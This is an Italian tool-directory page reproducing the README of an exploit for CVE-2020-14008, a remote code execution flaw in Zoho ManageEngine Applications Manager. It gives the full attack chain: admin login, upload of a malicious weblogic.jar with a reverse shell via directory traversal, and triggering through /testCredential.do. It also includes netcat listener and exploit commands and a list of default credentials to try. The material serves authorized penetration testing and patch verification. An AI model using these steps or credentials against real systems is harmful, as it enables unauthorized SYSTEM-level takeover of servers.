Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-14008 — CVE-2020-14008 - ManageEngine Applications Manager RCE | Kitploit
Strumenti/GitHubGitHub/0x0d3ad/cve-2020-14008
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso RemotoSviluppo Payload
GitHub0x0d3ad/cve-2020-14008

CVE-2020-14008

CVE-2020-14008 - ManageEngine Applications Manager RCE

Vedi Repository
314 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-14008 - Esecuzione di codice remoto su ManageEngine Applications Manager

Esecuzione di codice remota autenticata tramite caricamento arbitrario di file in Zoho ManageEngine Applications Manager (versioni <= 14720).

Riepilogo della vulnerabilità

Scarica lo strumento
DettaglioValore
CVECVE-2020-14008
CVSS7.2 (Alta)
TipoRCE autenticata / Caricamento arbitrario di file
ProdottoZoho ManageEngine Applications Manager
Versioni affetteVersione 14720 e precedenti
RequisitoCredenziali di amministratore valide
RisultatoReverse shell a livello di sistema (SYSTEM)

Lo sfruttamento abusa della funzionalità di test delle credenziali del monitor Weblogic. Un amministratore autenticato carica un file weblogic.jar malevolo nel percorso della libreria Weblogic previsto. Quando il test delle credenziali viene attivato, ManageEngine carica weblogic.jndi.Environment dal JAR caricato tramite JarLoader.loadClass() e newInstance(), eseguendo codice Java arbitrario.

Requisiti

Sistema

  • Python 3.x
  • Java JDK (javac e jar nel PATH)
  • nc (netcat) per catturare la reverse shell

Dipendenze Python

root@kitploit:~
pip3 install requests urllib3 lxml

Utilizzo

1. Avvia il listener

root@kitploit:~
nc -lvnp 1337

2. Esegui l'exploit

root@kitploit:~
python3 cve-2020-14008.py <URL> <USERNAME> <PASSWORD> <LHOST> <LPORT>

Esempi

root@kitploit:~
# Base
python3 cve-2020-14008.py https://192.168.100.2:8443 admin admin 192.168.100.3 1337

Flusso dell'exploit

  1. Login - Autenticati con credenziali di amministratore, ottieni il cookie di sessione
  2. Enumerazione - Recupera la directory di installazione base di ManageEngine
  3. Costruzione del JAR - Compila una classe Java malevola (weblogic.jndi.Environment) contenente una reverse shell in weblogic.jar
  4. Caricamento - Carica il JAR in classes/weblogic/version8/ tramite directory traversal (fallback: crea un'operazione pianificata per spostarlo)
  5. Attivazione - Invoca il test delle credenziali Weblogic su /testCredential.do, che carica e istanzia la classe malevola
  6. Shell - La reverse shell si collega al listener

Credenziali predefinite

Nome utentePassword
adminadmin
adminpassword
administratoradministrator
guestguest

Risoluzione dei problemi

ErroreSoluzione
release version 7 not supportedJava 21+ ha abbandonato il target Java 7. Lo script usa --release 8
FileNotFoundError: weblogic.jarCompilazione del JAR fallita. Verifica che javac e jar siano nel PATH
No valid response from used sessionCredenziali non valide
Actionname not foundCreazione dell'operazione fallita, verifica i permessi di amministratore

Riferimenti

  • NVD - CVE-2020-14008
  • Exploit-DB #48793
  • Avviso di sicurezza di ManageEngine

Dichiarazione di non responsabilità

Questo strumento è fornito esclusivamente per test di penetrazione autorizzati e ricerca sulla sicurezza. L'uso non autorizzato contro sistemi di cui non si è proprietari o per i quali non si ha il permesso di testare è illegale.